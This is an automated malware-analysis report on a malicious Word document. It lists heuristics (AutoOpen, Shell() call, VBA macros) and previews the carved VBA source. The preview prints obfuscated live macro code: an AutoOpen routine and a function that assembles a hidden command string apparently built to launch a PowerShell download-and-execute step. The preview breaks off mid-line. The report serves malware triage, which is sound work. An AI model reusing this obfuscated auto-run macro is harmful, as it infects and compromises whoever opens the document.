Verdict: MALICIOUS (risk score 142)

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and triggers the execution of the Shell() function, which is a critical finding. The macro appears to be obfuscated, making it difficult to determine the exact payload or destination. No specific family could be identified.
Heuristics (5)

- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 69347 bytes | ecd7f27615a323ba76e3d7b491a2f17e4c1309fa577cf2450063d9807d6aa92f |
Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "dhrKNljHHQjoKW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim sEamSI(2)
sEamSI(0) = Right(jzwZPn + orEzidXbtcAYYlMB + ivQiwAiO, 587) + Right(WbPqQ + naDLYaDjbZnDHGvnU + zIwYQ, 406)
sEamSI(1) = MidB(hIMCOrr + kEuUCoSaNUJucEauOAQFL + RbAXQQjZ, 63, 320) + Left(zTGGpHX + fIcfRwHUwjZIWDwDZVZ + zdaIuaz, 768) + Left(mTXsz + CiRFKownmKTBQGUoVwcuAv + kvvKz, 702) + Mid(qVjpoi + nnURrwjNLzcaKEnMvs + jDzQw, 203, 796)
Dim SzwQa(1)
SzwQa(0) = MidB(udfsB + zpOmYSfmYfawuhDwdw + CGvBzrU, 258, 566) + MidB(zCfuAT + KalzpOWwpEILLjdRibR + Jaucc, 748, 59)
Dim wtDRHG(2)
wtDRHG(0) = MidB(VWYZHvG + OXCCYsipPWmtbPiwIuZ + zGvmdBf, 770, 717) + Right(farZBo + rNwbKlsQIiZoAVwcFnki + mGBYEzU, 236) + MidB(TDilBfJ + CjkiEoHLcdHfXiwUMKON + CwnLba, 581, 417) + MidB(CCbwjzsI + YnIpNWjCVnVDJCqkCzldwmV + kOSGdCwO, 815, 971)
wtDRHG(1) = MidB(qoThK + RttizYhfJLCsSjEnsBNnzUv + KSwlG, 422, 717) + Mid(jShwXJFi + mHkfiowEGtKDUVNZwW + MEkAwiD, 660, 406)
Dim jVGNan(2)
jVGNan(0) = MidB(zOzmm + CEWlARWNakOuPXLFvFh + QiHzdia, 929, 654) + MidB(toDzaJ + mqZOpwtZhZnUBnVYjhAo + BGhTMfmz, 760, 333)
jVGNan(1) = Left(QSBkEzPI + sAidQkXMBtZnqMGnqjju + rXzdB, 486) + Right(IOjliP + afrzqfYwkNUIGDXY + jlcVBf, 541) + MidB(jmmQFE + PMMbiQLwvFZhnBrtPbpA + dDbiKHEE, 427, 167) + MidB(zFUQS + WFnVvwPKnFZMdNkUlo + LCfnDm, 489, 972)
Dim WkZbc(2)
WkZbc(0) = MidB(QnLGfAcZ + MWnqqznbWiPffoFkTcc + LnCWUODH, 479, 164) + MidB(Hcfmm + WMAIfKLWpHzjvCuQANSb + zMNMaz, 638, 418) + Left(nKfWc + hRRIzTzcrVEkKkihw + rZiHsAUW, 464) + Right(KlJYOzHu + FLQpzCAvuMDkZriqcFTjOb + lWiaCjw, 733)
WkZbc(1) = Right(RtzUbj + HAjjjJvmrlfBOjYFUJUm + QZSVIdj, 733) + MidB(RrEmZi + GAiMDMWFiaVmOTkcFi + tStPj, 193, 745) + Mid(hYfnvEVG + bFMNhvBSpBswptJz + QwkoOiIH, 287, 271) + MidB(bmwhF + oITqoGnoFKLHLHb + VmtDbi, 326, 812)
nizIDLKsU (KeyString(Lmqijk + tQQizWOE + 3 + 8 + 56 + wTvVkbT + Lclov) + RvJfEkqv + uTfQp + KeyString(SLQUpC + QZjPHc + 3 + 9 + 65 + DETubbNd + jjzktW) + fEjIcZcBk + EnMwtrtaPWE + HvYYK + phjABfnuR + NwHFIjz + ozlwn + vdHuT)
Dim wlEHD(1)
wlEHD(0) = MidB(PuaRk + vXOulZXZtJJTSViz + UXaYSw, 669, 642) + Right(fiLnI + JzobLLwtEvbFimdzoWTZqp + ifPTLDYZ, 8) + Mid(IMciqrnF + tBdMIbpXzlwTUljYjJ + pRnMrc, 660, 73) + Right(YldlH + wjcQGJsQfGDjHlouV + MptBuui, 706)
Dim BNuTb(1)
BNuTb(0) = Left(jsqBO + JtQimwPXNUOzLaSrzaRW + NDIEvzY, 618) + Mid(krMhGhl + zNpZkjPXQosWtEOKbPviFt + OllSoa, 806, 443) + MidB(iXYfOB + tOwIITaORDiaMBzmzz + WoAOrmv, 29, 887) + Left(zwVFd + OMYTmpzwiRPSFbUHwboS + Lifiq, 913)
Dim jwiZJz(2)
jwiZJz(0) = MidB(uEazb + dOdrwiNOWnPwZfF + jskwmF, 737, 511) + MidB(PNtwR + tcRwjCVdiswszdTlifF + HCGHadG, 964, 351) + Right(cLYAYhc + tifNWNPfBZnlqqvuzXud + PnFTM, 929) + MidB(PjdWskMO + QvzqUiKmhIEzFGaKKS + qWJMKU, 211, 659)
jwiZJz(1) = Left(cNPIZSWA + VoLhcmdmERYJULV + bzXIWmEz, 644) + MidB(KQvACKck + hwhdcDqEHBsMiVQqzpwi + iPYGJ, 668, 715) + MidB(tDqit + zczlREflHRtlRQWuoSs + QsEoRa, 459, 324) + MidB(rTffpiC + BRrqPIZHzvuFhYzXNKk + ZARlkhQ, 719, 503)
End Sub
Attribute VB_Name = "HZCpjfAPRLpmm"
Function fEjIcZcBk()
ujKvFWHX = "d \\\\ \//\/ \/ " + "/V:/C" + """" + "set {;],=207a " + "a072 270a 207a " + "a207 72a0 702a 270a" + " 0a72 0a27 027a 7a" + "02 07a2 72"
RhFDwQdL = "0a 720a 207a 70a2" + " 027a}027a" + "}702a{72a0h" + "a270c07a2t" + "a702a07a2c20a7}20" + "7a;a702ka720a027ae07"
JPLHY = "2ar27a0b02a7;7a2" + "0ia207a027ao270" + "a$270a 7a20" + "m2a07e70a2t7" + "a02I0a27-7" + "a20e7a20k0a27"
fEjIcZcBk = ujKvFWHX + RhFDwQdL + JPLHY
Dim TBosin(1)
TBosin(0) = MidB(tRNjf + YRLLWqwwbjsHCIXsqK + XNkwli, 403, 565) + Right(DuWzPf + mhIdPKblELnbGhzlsXSbzd + qlCssDwX, 187) + MidB(waWAOQRS + MZLStwWUKAsKkLTjfi + tzLVXDL, 624, 210) + MidB(dLqaw + CEBtFPzBEzjOOSTiazRud + IGoWkV, 533, 114)
Dim dOPUA(1)
dOPUA(0) = MidB(obrdF + JjifUwnkrjoRYJpSpCiA + EXCRUIdf, 270, 30) + MidB(THDZp + lLppvDonKwaftLuVPjF +
```

... (truncated)